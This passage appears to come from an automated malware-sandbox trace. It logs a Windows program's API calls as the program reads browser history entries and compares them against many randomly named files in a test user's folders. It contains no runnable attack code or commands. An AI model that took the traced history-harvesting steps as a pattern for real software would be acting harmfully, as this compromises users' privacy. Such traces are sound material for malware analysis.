_String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qu7qixvgbko.swf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/8ep2zuetsnplh6gpu01.ots") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/j-fqx8oz1.flv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/hkofn.rtf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4-pa3_vg9kycz2coo.swf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/dxixxj.gif") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/qcjka57cosu3vmhw1m.flv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/6itn%20raypy3k4dh-lrq.bmp") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/khv7bwlacmmomab9eeg.odt") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/duzlmllyi_us.flv") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/auhiftr.pdf") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/9u1awhjmofi.gif") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7qgdkajlv%20ov0mtf.pptx") returned 1 [0085.875] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/y7ykwwplwltoj6hk%20z.pptx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/oz2_mrsbrizc.xlsx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/cs9dbb0db.pps") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/7ogjb-qe0l0.rtf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/thsn5kdbg.jpg") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/yfxu1rpal7.bmp") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/_5xg3ier-feuapuc9w9.odp") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/lpldj8us8y.ods") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/u9ror.flv") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/jnes3c.rtf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/nonghmvfyp69p.pptx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ityxkmicvrin0btq.gif") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/paszghjjdktqmq.png") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/atbj.png") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/n0tkysumll.odt") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/frpgv.pptx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/wal.gif") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/49gdy95-0c.mkv") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/gyuix6ohet.swf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/zh5or54.jpg") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/6ajwk7gtt_t6-1wj3g.odp") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/abd4adf.doc") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/cwmce43u6a.png") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/f-0yo_9neejgd78f.xlsx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/mtgrgfodayrae.png") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3i2irr0cmclax.rtf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ko7vfyuf_s9dmc.bmp") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/rca29ok1r73tia22zn.mkv") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/qah0uzv-.ppt") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kapjdjpm0.gif") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/2owth4htj.pdf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/1xfm.xlsx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/kfhuhsl.rtf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/-53xiemee-e.docx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ju_dzyrs7jfe4.pdf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/ix0knq7j3.rtf") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/kipmxd08jtyra4.jpg") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/uegk7xbr6-krprckyd.docx") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/glvvvpveb1b9fqlag7.ots") returned 1 [0085.876] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/nj1ua7qn.png") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/0swdp%200jtaygezojn.swf") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/ra1qxhagr06tsse5srl.xlsx") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vtvzhju6h4lqxexi9ef9.jpg") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/l2ikfr.xlsx") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ed35v.mkv") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ysbwvdgi513gve8gdts0.swf") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/v27ythjhtm5zniry.ots") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/lj3nratt.jpg") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/7tlu060tehfman8.jpg") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/_j5.png") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/s2p0ekc.xlsx") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/l5kv.swf") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/yaw0ef1-rv%20j.png") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/aq04%20pkplamwzt5%20j.rtf") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/qbgwpiv.swf") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/3xopvc16f2j.odp") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/qag1ipilh.png") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ausvdds.flv") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/inefsuw.ots") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uj4x.ots") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/deuujnf811ulfl.pptx") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ri2tsf%20eliz.png") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/0mguk_iy.odt") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/xzebuk9_oi5.xls") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lwsaqubpfkfk.mkv") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/f485kpxiwze6mw85xh.gif") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/d3l_n2j.doc") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ydkx2uosagxc.mkv") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/uhcszzxqqxrciv3_g.odp") returned 1 [0085.877] wcscmp (_String1="http://www.msn.com/", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/y9zt5oxv0ooeq.png") returned 1 [0085.877] wcslen (_String="http://www.msn.com/") returned 0x13 [0085.877] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x8, lpNumberOfBytesRead=0x282524, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282524*=0x8, lpOverlapped=0x0) returned 1 [0085.877] _memicmp (_Buf1=0x28677c, _Buf2=0x44a6cc, _Size=0x4) returned 0 [0085.877] ReadFile (in: hFile=0xa0, lpBuffer=0x28677c, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x282520, lpOverlapped=0x0 | out: lpBuffer=0x28677c*, lpNumberOfBytesRead=0x282520*=0x100, lpOverlapped=0x0) returned 1 [0085.877] _strlwr (in: _Str="https://support.microsoft.com/internet-explorer" | out: _Str="https://support.microsoft.com/internet-explorer") returned="https://support.microsoft.com/internet-explorer" [0085.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2867fd, cbMultiByte=-1, lpWideCharStr=0x28257c, cchWideChar=8192 | out: lpWideCharStr="https://support.microsoft.com/internet-explorer") returned 48 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="http://www.msn.com/") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2=":host: computer") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8~1/desktop/sample_file.doc") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/o%201bunagzfik.flv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/4q6akwegf.mkv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cs-nayun66m1kj0qh.flv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/kdgk.docx") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/txcexlftylq2o.gif") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/lxcfr82x4aq4uswn.mkv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/y0vxikbyowmim.gif") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/x-baj.mkv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/gm13ifqvw%20o2ca5sqcfu.gif") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/crxv%20j7wkoocqrc.flv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/ggxj998_.flv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/pvp12cuh1.mkv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/hsii3%20s6wx.ots") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ivpbf2a6zwg8th8g0v.swf") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/ym9tcvsa3hy3_sch.swf") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/ncgtsu2wgq6.bmp") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/yzvsri7wb0.pdf") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/nnkxqyu2c.bmp") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/cvm_.jpg") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/uwefm1na-dsdirw%20v7.bmp") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/saeibjk2.odp") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/pjm8g%20hd0vdm.docx") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/jbjbayjalmaqe.jpg") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/p0mmc6mktcpt8jz.ots") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/xqiysgiqzh.swf") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/xcrdcv/shcj2ukhha9e2.png") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/hdfqw%20qk5silpa%20io/0ivkoykeh0-af8.png") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/zwfvn9iebk6wzpag.mkv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/v0ufl0ag.flv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/a3ne_yxum0cld.csv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/6fshffojtwspry33.ppt") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/hby7gwij.doc") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/uhtkq-tczvm9tdvxvw.flv") returned 1 [0085.878] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/msez/28laxbsq3m50.jpg") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/xcj9p.jpg") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/gxv2c5bzmuai647pclru.xlsx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/w5qvdpae9jrz.pdf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/kvgo2ps.odt") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/lu_nzwrgi2ssxtfhhhg.swf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/c9v5cwhsfounz.png") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/g5ve1ybcahauz0t.gif") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/3sc0z1bfbrlsq.ppt") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/mo6xttvz/z2lyobass%20shwl/tpxyvhqitsjwonkmm/ywz6bckdgkeadv/ohxnykh_ufz4.gif") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/2n_gtpylh.odt") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/dc0kkkmref9xs.swf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bbuhdsebor_wx0_ly.flv") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/neiwqsqwjb.docx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/i-vzxxaq.ppt") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/s%201xjks5rgwiostrv.flv") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/ie86ieikrrj2tctdthln.flv") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/e1-szdw/cthtm1stuuxwdzgs.swf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/keqrajwwgkvsr.bmp") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/xad6dacxjlfsnkrl.mkv") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/9zd4.pptx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/appdata/roaming/uprrnkocaj.swf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/ycpzmkirbkzdd83zh.pps") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/bgq5sdc_j4q1pn3g.mkv") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/meivqh73.jpg") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/kfcaijye4jotjfgcvvz.docx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/pictures/v8zjpd1uv_.bmp") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/7ulx.jpg") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/kpuzfgcfs9u.swf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/olv5jdb-ffdifmwqcs.docx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/documents/lo28gaemu_vvrwsd70/i4z-zbsf9hntkbakip/rnvh3h9ck0e39pnq.pdf") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/vwkcvzfj9feo9nnp/mik5.xlsx") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/videos/zqr7exbiokjx.mkv") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", _String2="file:///c:/users/bgc6u8oy%20yxgxkr/desktop/gvvprgs0c.png") returned 1 [0085.879] wcscmp (_String1="https://support.microsoft.com/internet-explorer", 